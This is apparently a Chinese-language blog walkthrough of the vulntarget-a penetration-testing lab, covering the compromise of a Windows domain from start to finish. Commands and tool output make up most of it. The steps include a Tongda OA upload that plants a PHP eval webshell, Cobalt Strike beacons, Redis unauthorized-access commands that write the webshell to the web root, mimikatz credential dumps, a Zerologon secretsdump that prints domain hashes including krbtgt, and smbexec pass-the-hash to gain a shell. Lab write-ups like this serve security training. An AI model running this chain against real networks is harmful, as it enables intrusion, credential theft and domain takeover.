212 字
1 分钟
vulntarget-a
vulntarget-a
Windows7
信息收集
nmap -Pn -sV 192.168.111.20
⚡ root@kali /home/kali nmap -Pn -sV 192.168.111.20
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-19 22:17 +0800Nmap scan report for 192.168.111.20Host is up (0.052s latency).Not shown: 996 filtered tcp ports (no-response)PORT STATE SERVICE VERSION80/tcp open http nginx135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 19.24 seconds通达OA文件上传拿到shell
访问80端口 发现是通达oa系统 直接利用工具检测

上传一句话木马 连接蚁剑


创建cs服务
使用cs生成后门连接

内网信息收集
ipconfig
[09/19 22:41:35] beacon> shell ipconfig[09/19 22:41:36] [*] Tasked beacon to run: ipconfig[09/19 22:41:37] [+] host called home, sent: 39 bytes[09/19 22:41:38] [+] received output:
Windows IP 配置
以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::4da1:3d14:4c13:5de3%13 IPv4 地址 . . . . . . . . . . . . : 10.0.20.98 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . :
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::d1a2:f1b5:7745:3929%11 IPv4 地址 . . . . . . . . . . . . : 192.168.111.20 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . :
隧道适配器 isatap.{0EECF21A-AF38-44FF-B9D1-AA7055B9B9AA}:
媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 isatap.{C16C4D2C-F074-4634-A62D-2B70BC241EE5}:
媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . :端口扫描
[09/19 22:42:44] beacon> portscan 10.0.20.0-10.0.20.255 1-1024,3389,5000-6000 arp 1024[09/19 22:42:44] [*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 10.0.20.0-10.0.20.255[09/19 22:42:46] [+] host called home, sent: 93797 bytes[09/19 22:43:00] [+] received output:(ARP) Target '10.0.20.98' is alive. 00-50-56-B1-D7-96(ARP) Target '10.0.20.99' is alive. 00-50-56-B1-BB-5E
[09/19 22:43:17] [+] received output:10.0.20.99:5985
[09/19 22:43:58] [+] received output:10.0.20.99:80
[09/19 22:44:04] [+] received output:10.0.20.98:5357
[09/19 22:44:07] [+] received output:10.0.20.98:13910.0.20.98:13510.0.20.98:11010.0.20.98:80
[09/19 22:44:09] [+] received output:10.0.20.98:445 (platform: 500 version: 6.1 name: WIN7-PC domain: WORKGROUP)Scanner module is complete我们下一步的目标就是10.0.20.99
windows server 2016
使用cs建立socks4隧道 然后使用
proxychains nmap -sT -Pn 10.0.20.99进行端口扫描
发现存在redis端口 尝试未授权访问
redis未授权
config set dir "C:/phpStudy/PHPTutorial/WWW"config set dbfilename shell.phpset x "<?php @eval($_POST['1']);?>"saveexit ⚡ root@kali /mnt/hgfs/Cyber_Security/CTF/无境/内网域渗透/vulntarget-a proxychains redis-cli -h 10.0.20.99[proxychains] config file found: /etc/proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.17[proxychains] Dynamic chain ... 127.0.0.1:31959 ... 10.0.20.99:6379 ... OK10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW"OK10.0.20.99:6379> config set dbfilename shell.phpOK10.0.20.99:6379> set x "<?php @eval($_POST['1']);?>"OK10.0.20.99:6379> saveOK(0.54s)10.0.20.99:6379> exit上线cs
然后使用蚁剑连接 上传正向后门

执行后上线cs
connect 10.0.20.99 4444信息收集
ipconfig
[09/20 15:16:07] beacon> shell ipconfig[09/20 15:16:07] [*] Tasked beacon to run: ipconfig[09/20 15:16:07] [+] host called home, sent: 39 bytes[09/20 15:16:09] [+] received output:
Windows IP 配置
以太网适配器 Ethernet0:
连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::adef:3dbb:c356:2014%9 IPv4 地址 . . . . . . . . . . . . : 10.0.20.99 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . :
以太网适配器 Ethernet1:
连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::5d33:cebb:4b48:b4f7%12 IPv4 地址 . . . . . . . . . . . . : 10.0.10.111 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . :
隧道适配器 isatap.{A7027029-ECC3-4186-BC98-9DCE01AAA9D0}:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接 连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 Reusable ISATAP Interface {3DA37866-F097-4088-BC52-B3F6873B5E31}:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接 连接特定的 DNS 后缀 . . . . . . . :端口扫描
[09/20 15:14:30] beacon> portscan 10.0.10.0-10.0.10.255 1-1024,3389,5000-6000 arp 1024[09/20 15:14:30] [*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 10.0.10.0-10.0.10.255[09/20 15:14:31] [+] host called home, sent: 93797 bytes[09/20 15:14:44] [+] received output:(ARP) Target '10.0.10.111' is alive. 00-50-56-B1-9F-EA(ARP) Target '10.0.10.110' is alive. 00-50-56-B1-3F-6C
[09/20 15:15:02] [+] received output:10.0.10.111:5985
[09/20 15:15:05] [+] received output:10.0.10.111:13910.0.10.111:13510.0.10.111:8010.0.10.110:5985
[09/20 15:15:39] [+] received output:10.0.10.110:636
[09/20 15:15:41] [+] received output:10.0.10.110:593
[09/20 15:15:44] [+] received output:10.0.10.110:46410.0.10.110:389
[09/20 15:15:46] [+] received output:10.0.10.110:13910.0.10.110:135
[09/20 15:15:49] [+] received output:10.0.10.110:88
[09/20 15:15:51] [+] received output:10.0.10.110:53
[09/20 15:16:03] [+] received output:10.0.10.110:445 (platform: 500 version: 10.0 name: WIN2019 domain: VULNTARGET)10.0.10.111:445 (platform: 500 version: 10.0 name: WIN2016 domain: VULNTARGET)10.0.10.110
查看域+dc
[09/20 15:16:58] beacon> shell net view /domain[09/20 15:16:58] [*] Tasked beacon to run: net view /domain[09/20 15:16:59] [+] host called home, sent: 47 bytes[09/20 15:17:11] [+] received output:发生系统错误 6118。
此工作组的服务器列表当前无法使用
[09/20 15:17:20] beacon> shell net time /domain[09/20 15:17:20] [*] Tasked beacon to run: net time /domain[09/20 15:17:20] [+] host called home, sent: 47 bytes[09/20 15:17:21] [+] received output:\\win2019.vulntarget.com 的当前时间是 2026/9/20 15:17:25
命令成功完成。确定域名是win2019.vulntarget.com
查看dc
[09/20 15:18:15] beacon> shell ping win2019.vulntarget.com[09/20 15:18:15] [*] Tasked beacon to run: ping win2019.vulntarget.com[09/20 15:18:15] [+] host called home, sent: 58 bytes[09/20 15:18:19] [+] received output:
正在 Ping win2019.vulntarget.com [10.0.10.110] 具有 32 字节的数据:来自 10.0.10.110 的回复: 字节=32 时间<1ms TTL=128来自 10.0.10.110 的回复: 字节=32 时间<1ms TTL=128来自 10.0.10.110 的回复: 字节=32 时间<1ms TTL=128来自 10.0.10.110 的回复: 字节=32 时间<1ms TTL=128
10.0.10.110 的 Ping 统计信息: 数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),往返行程的估计时间(以毫秒为单位): 最短 = 0ms,最长 = 0ms,平均 = 0msDC IP<10>10>.0.10.110
抓取密码
[09/20 15:19:24] [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command[09/20 15:19:26] [+] host called home, sent: 788090 bytes[09/20 15:19:28] [+] received output:
Authentication Id : 0 ; 84475 (00000000:000149fb)Session : Interactive from 1User Name : DWM-1Domain : Window ManagerLogon Server : (null)Logon Time : 2026/9/20 14:22:30SID : S-1-5-90-0-1 msv : [00000005] Primary * Username : WIN2016$ * Domain : VULNTARGET * NTLM : 0012423c9c41e23d774b9d57d21f5043 * SHA1 : 022a554a552592cf3d41f2b24ba1f5c50de5e49c tspkg : wdigest : * Username : WIN2016$ * Domain : VULNTARGET * Password : (null) kerberos : * Username : WIN2016$ * Domain : vulntarget.com * Password : 86 fc 9f 6e 8d 22 8a ad ec 6b 91 25 88 af 2a 95 82 92 47 f4 b4 1f 13 5c e5 0e 81 9b 01 61 89 dc 9d ad 4e 35 a7 d2 ea 55 1f 49 c7 4c a1 e0 fb 0b 92 47 c6 d5 9a 0b 71 e3 95 83 db d5 63 23 d8 b3 fa 93 a6 aa 57 8a bb a0 b6 30 fb 92 40 b1 98 c6 73 2e ef 3a a0 70 1f c2 0a 51 1a 20 be 7b 2f 52 38 fa 98 98 0b 95 7b bf 99 a2 71 a5 02 97 9e 53 b6 1f eb 5f a3 ba 99 fc 5b 01 f0 78 20 69 de 28 3f 06 ba 07 a7 03 39 5d 61 e0 94 3e 4f a6 00 38 bd 79 63 e5 a6 42 52 38 72 44 20 32 af a0 3a 04 3f 35 d5 b8 24 1f 8f ae c0 a6 2b 6b fa 7d c1 c4 74 c7 52 3b ce ca 09 d1 92 dc f2 22 75 10 f3 d9 69 cc 14 21 81 3f 7e 25 10 4b a2 b6 31 f5 f0 d6 5f 3f 5c fd b6 96 07 da df 95 d4 17 2e bd a2 19 53 e3 97 ec a9 27 07 a8 41 b8 75 06 68 4b 20 45 ssp : credman :
Authentication Id : 0 ; 996 (00000000:000003e4)Session : Service from 0User Name : WIN2016$Domain : VULNTARGETLogon Server : (null)Logon Time : 2026/9/20 14:22:28SID : S-1-5-20 msv : [00000005] Primary * Username : WIN2016$ * Domain : VULNTARGET * NTLM : d5ede5c0b42d5bed437d7771d5e27c72 * SHA1 : 9cc5e8b77d1269baa6580c1f3862576c909b2d2a tspkg : wdigest : * Username : WIN2016$ * Domain : VULNTARGET * Password : (null) kerberos : * Username : win2016$ * Domain : VULNTARGET.COM * Password : 30 d6 b9 cb 97 3c 49 d5 2f 9f ee dd a6 d3 5b e1 aa 72 b6 61 8b da 37 45 ab 6c 6c 19 91 c1 8d 6c 01 1f 16 9e 5a 5a bf 23 2b 0b b0 7f a1 c5 88 b5 d2 c7 ea b6 a8 25 13 8c c1 bc cc 58 e2 a1 d8 27 ee 45 89 a6 6d 84 fc c7 87 e7 e4 f5 ee 79 f1 09 b3 dc 7f 3e 46 6d cf 79 cc 60 86 e9 b2 2b 14 38 37 4e 44 c8 31 93 b5 88 a7 7c e4 66 35 7e dc 5c 9b 79 3e ea ef d0 eb 39 0e b1 ab 7e 10 44 7b 9b 76 7a 4e 57 b6 0d c9 b6 97 03 6d 8f 5d eb c1 5c ac 9c 78 de dd 1b df 11 f0 dc 83 50 8d d4 3a b7 00 0f 86 55 51 c0 d6 da ea 1f 4b aa f9 a9 31 3b ef ed d9 f5 ba 03 fb 54 46 cb 30 69 5f 9a 21 3b 9b 3f 4e 43 6a b4 5e 84 bb 4c 1f 18 79 7a 2c 6b 5b cb 14 9b 2c 78 ff 46 a6 98 87 ee b2 d3 0a 4e 3e 4b 6f 11 17 dc 31 3d 40 f6 f9 0e 80 27 1f 8e ssp : credman :
Authentication Id : 0 ; 46265 (00000000:0000b4b9)Session : UndefinedLogonType from 0User Name : (null)Domain : (null)Logon Server : (null)Logon Time : 2026/9/20 14:22:27SID : msv : [00000005] Primary * Username : WIN2016$ * Domain : VULNTARGET * NTLM : d5ede5c0b42d5bed437d7771d5e27c72 * SHA1 : 9cc5e8b77d1269baa6580c1f3862576c909b2d2a tspkg : wdigest : kerberos : ssp : credman :
Authentication Id : 0 ; 84458 (00000000:000149ea)Session : Interactive from 1User Name : DWM-1Domain : Window ManagerLogon Server : (null)Logon Time : 2026/9/20 14:22:30SID : S-1-5-90-0-1 msv : [00000005] Primary * Username : WIN2016$ * Domain : VULNTARGET * NTLM : d5ede5c0b42d5bed437d7771d5e27c72 * SHA1 : 9cc5e8b77d1269baa6580c1f3862576c909b2d2a tspkg : wdigest : * Username : WIN2016$ * Domain : VULNTARGET * Password : (null) kerberos : * Username : WIN2016$ * Domain : vulntarget.com * Password : 30 d6 b9 cb 97 3c 49 d5 2f 9f ee dd a6 d3 5b e1 aa 72 b6 61 8b da 37 45 ab 6c 6c 19 91 c1 8d 6c 01 1f 16 9e 5a 5a bf 23 2b 0b b0 7f a1 c5 88 b5 d2 c7 ea b6 a8 25 13 8c c1 bc cc 58 e2 a1 d8 27 ee 45 89 a6 6d 84 fc c7 87 e7 e4 f5 ee 79 f1 09 b3 dc 7f 3e 46 6d cf 79 cc 60 86 e9 b2 2b 14 38 37 4e 44 c8 31 93 b5 88 a7 7c e4 66 35 7e dc 5c 9b 79 3e ea ef d0 eb 39 0e b1 ab 7e 10 44 7b 9b 76 7a 4e 57 b6 0d c9 b6 97 03 6d 8f 5d eb c1 5c ac 9c 78 de dd 1b df 11 f0 dc 83 50 8d d4 3a b7 00 0f 86 55 51 c0 d6 da ea 1f 4b aa f9 a9 31 3b ef ed d9 f5 ba 03 fb 54 46 cb 30 69 5f 9a 21 3b 9b 3f 4e 43 6a b4 5e 84 bb 4c 1f 18 79 7a 2c 6b 5b cb 14 9b 2c 78 ff 46 a6 98 87 ee b2 d3 0a 4e 3e 4b 6f 11 17 dc 31 3d 40 f6 f9 0e 80 27 1f 8e ssp : credman :
Authentication Id : 0 ; 997 (00000000:000003e5)Session : Service from 0User Name : LOCAL SERVICEDomain : NT AUTHORITYLogon Server : (null)Logon Time : 2026/9/20 14:22:30SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman :
Authentication Id : 0 ; 999 (00000000:000003e7)Session : UndefinedLogonType from 0User Name : WIN2016$Domain : VULNTARGETLogon Server : (null)Logon Time : 2026/9/20 14:22:26SID : S-1-5-18 msv : tspkg : wdigest : * Username : WIN2016$ * Domain : VULNTARGET * Password : (null) kerberos : * Username : win2016$ * Domain : VULNTARGET.COM * Password : (null) ssp : credman :Windows Server 2019
抓密码也没有抓到有用的信息 先尝试一下zerologon

利用impact套件
⚡ root@kali /mnt/hgfs/Cyber_Security/tool/web/Intranet_penetration/横向移动/impacket-0.13.1/examples proxychains python3 secretsdump.py vulntarget/win2019\$@10.0.10.110 -no-pass[proxychains] config file found: /etc/proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.17Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Dynamic chain ... 127.0.0.1:43347 ... 10.0.10.110:445 ... OK[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secrets[proxychains] Dynamic chain ... 127.0.0.1:43347 ... 10.0.10.110:135 ... OK[proxychains] Dynamic chain ... 127.0.0.1:43347 ... 10.0.10.110:49667 ... OKAdministrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:d5ede5c0b42d5bed437d7771d5e27c72:::[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51dAdministrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1Administrator:des-cbc-md5:dcc29476a789ec9ekrbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cdedkrbtgt:des-cbc-md5:10efae67c7026dbfvulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25WIN2019$:des-cbc-md5:01c8894f541023bcWIN2016$:aes256-cts-hmac-sha1-96:eef6ab2b3b032260d760cfdf9435995c3dc6fee004426759945d5beba39a747dWIN2016$:aes128-cts-hmac-sha1-96:0dc0e8aded249a7a0529806738100096WIN2016$:des-cbc-md5:a257c1aeae159da2[*] Cleaning up... ⚡ root@kali /mnt/hgfs/Cyber_Security/tool/web/Intranet_penetration/横向移动/impacket-0.13.1/examples proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110[proxychains] config file found: /etc/proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.17Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Dynamic chain ... 127.0.0.1:43347 ... 10.0.10.110:445 ... OK[!] Launching semi-interactive shell - Careful what you executeC:\Windows\system32>type C:\flag.txtd8e0961b214ff94e55115eea28cd9073C:\Windows\system32>
分享
如果这篇文章对你有帮助,欢迎分享给更多人!
部分信息可能已经过时
相关文章 智能推荐